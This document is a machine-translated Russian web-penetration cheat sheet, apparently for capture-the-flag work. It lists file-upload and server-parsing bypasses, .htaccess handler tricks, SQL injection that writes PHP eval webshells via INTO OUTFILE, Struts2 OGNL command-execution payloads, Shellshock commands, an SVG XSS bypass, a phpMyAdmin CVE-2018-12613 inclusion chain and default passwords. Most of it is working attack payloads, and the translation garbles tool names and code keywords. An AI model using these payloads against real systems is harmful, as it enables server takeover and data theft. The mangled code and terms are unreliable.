уязвимость загрузки файла
при загрузке PHP не удается, рассмотреть белый список файлы (изменить суффикс php5, PHP3)
IIS6 Синтаксической Уязвимость: Когда загружено в каталог для /*.asp, любые файлы, которые анализируются как жерех, жерех форма загрузка фиг. TXT лошадь или лошади, подключен (напрямую подключен к соединению)
инъекции SQL
числовая инъекции: Нет апостроф
инъекции характер: передний и символ комментария после одинарные кавычки, универсальный пароль «или» 1 «=» 1 , кроме
слепых ,
доступных инструментов, процедур, Отрыжка взрывных работ , чтобы помочь
регулярные инъекции
1 и 1 = (выберите 1 из INFORMATION_SCHEMA.TABLES где table_schema = «ххх» и table_name регулярного выражения '^ мы [аз] предел 0,1)
Примечание: все матчи регулярно, обычный жалюзи ограничивает п, 1 разными, п не необходимо изменить
то же самое, аналогично используется как обычный
выбор () , как «ро%» пользователя
Слабый пароль
администратора администратор / администратор admin888 / администратор 123456 / администратор домена / тест тест / тест test123
Файл синтаксического анализа уязвимостей
каталог решительность
/xx.asp/webshell.jpg
/xx.asa/webshell.jpg
файл разборе
webshell.asp, JPG применяется к iis6
Апач разборе уязвимость
test.php.xxx.yyy суффиксы х и у всех непризнанных имя
копия xx.jpg / B + yy.txt / а xy.jpg фигура Ма -> конфигурация SP.jpg, написать <PHP fputs (FOPEN ( 'payload.php ', 'W'), «<PHP Eval ?? ($ _POST [хехе])> «); ??>, SP.jpg доступа / .php подходит для Fast-CGI открытия 0х02 IIS 7.0 / IIS 7.5 / Nginx версии <= 8.03
/xx.jpg%00.php в быстром -CGI дело закрыто, Nginx <= 0.8.37
редкий суффикс
PHP ароматические PHTML, РНТ, php3, php4, php5, Pyc и гнойно
.htaccess использовать
.htaccess , если файл может быть загружен и может покрыть первоначальную конфигурацию, конфигурационный файл записывается <FilesMatch "1"> SetHandler применение / х-HTTPD-PHP </ FilesMatch>
Наделение условия: файл конфигурации Apache, чтобы написать: AllowOverride All
модули загрузки mod_rewrite, запись в файле конфигурации Apache: LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
(Необходим в Ubuntu) Судо a2enmod переписать с
использованием
типов MIME Обзор: .htaccess записи: приложение AddType / X-httpd- PHP
или написать <FilesMatch "shell.jpg"> приложения SetHandler / х-HTTPD-PHP </ FilesMatch>, может быть разрешен к shell.jpg PHP
или написать <FilesMatch «Привет»> SetHandler применение / х-HTTPD-PHP </ FilesMatch>, до тех пор , как они интерпретируются как - нибудь , содержащей PHP
SQL написать оболочку
. 1 'ВЫБЕРИТЕ союз 1,' <PHP Eval ($ _ СТОЛБ [A]); ??> 'в выходной файл' в Outfile /var/www/tmp/a.php'# с письменным словом *** PHP, помещение: знать абсолютный путь к площадке части слов *** поворот шестигранной
абсолютный путь можно записать в выходной файл , когда вымышленный путь действительно сломал путь
обходных обходные пространств , такие как защитный союз может быть переписан как ООН ион накидного
Struct2 s2-16 лазейки
найти действие, а затем построить следующий код (в index.action, команду перенаправления в качестве примера, код для выполнения роли *** команды и загрузите файл на локальный)
index.action редиректа :? A = $ {# (новый новый java.lang.ProcessBuilder (новый java.lang.String [] { ' LS', '\'})). Пуск () # б = # a.getInputStream (), # с = новый java.io.InputStreamReader ( #b), # д = новый java.io.BufferedReader (#c), # е = новый символ [50000], # d.read (#e), # = # матовое context.get ( «com.opensymphony.xwork2 .dispatcher.HttpServletResponse «), # matt.getWriter (). Println (#E), # matt.getWriter (). смыва (), # matt.getWriter (). Close ()}
новый новый java.lang.String [] { «LS», «\» } *** как команда
для index.action перенаправления :? за содержание, то , возможно , потребуется транскодирования URL
следующий код можно использовать эхо - сайт абсолютный путь
index.action перенаправления: $ {# а = # context.get ( 'com.opensymphony.xwork2.dispatcher.HttpServletRequest'), # б = # a.getSession (), # с = # b.getServletContext (), # д = # c.getRealPath ( "/"), # = # матовое context.get ( 'com.opensymphony.xwork2.dispatcher.HttpServletResponse'), # matt.getWriter (). Println (#d), # matt.getWriter () .flush (), # matt.getWriter (). Close ()}
以上代码均为ONGL表达式
Баш удаленных исполнения команд уязвимость
ищет /cgi-bin/x.cgi или непосредственно с поисковыми системами , чтобы найти CGI
эксплуатирует () {:}; + команда (с захватом отрыжки, это заявление в связи или агент пользователя)
примеры команды:
() {};:; эхо; / бен / Баш -c 'CAT /key.txt'
() {:;}; эхо; / бен / LS /
эхо - сигнала; закрыт для функции
Svn исходного кода Leak Уязвимость
/.svn/entries номер дисплей веб - каталог
/.svn/wc.db загружаемой базы данных с программным обеспечением базы данных , такими как SQLiteStudio открытого (или попытки открыть текстовый переименованный notpad ++), затем искать ключ
0day Обход
<SVG> <Скрипт XLink: при регистрации HREF = Данные :, оповещения (1.)> <Скрипт /> Тег </ SVG> с помощью байпаса SVG
PHP бэкенд файл уязвимость включение в CVE-2018-12613
предпосылке: Логин Web
Open SQL, написать SELECT '<PHP phpinfo () ??>;'
Отрыжка захвата, записи куки (PhpMyAdmin = ххх) ,
используя файл , который содержит уязвимость
index.php? DB = цели sql.php% 253F /../../../../../../../../../../../ TMP / Sess + куки ранее записанные
(сеанс сохранения каталога Macos в / вар / TMP /, сеанс в Linux сохранить каталог / вар / Библиотека / PHP / сеансов ) ,
чтобы найти путь в phpinfo, абсолютный путь , чтобы найти сайта
пример: / вар / WWW / HTML /
через SQL в Outfile способ написать лошадь:
Оператор SELECT <PHP @eval ($ _ POST [а]) ??>; 'INTO Outfile '/var/www/html/a.php'
Инъекции HTTP заголовок (X-Forwarded-за)
захват, отправить повторитель, написанный X-Forwarded-For: или 1 = 1 ,
если есть ошибка впрыск с
последующим обычным SQL - инъекции (заказ по ... союзом выберите .. .)
Struct2 s2-04 лазейку
модели использования: / распорки /../ каталог возвратов
обходные: URL закодирован ..% 2f, если не вернется к нормальной явной попытке вторичного URL закодированного ..% 252F
Параметры представить:
? / + Параметр Параметр может быть представлен на веб - сайте, представление доступно отрыжка быть изменен
Чтения файла
Пример: index.php JPG = hei.jpg переписывание index.php JPG = index.php может прочитать содержимое index.php ??
PhpStorm по Created
.idea файл PhpStorm будет сгенерирован автоматически, который будет содержать набор XML - файла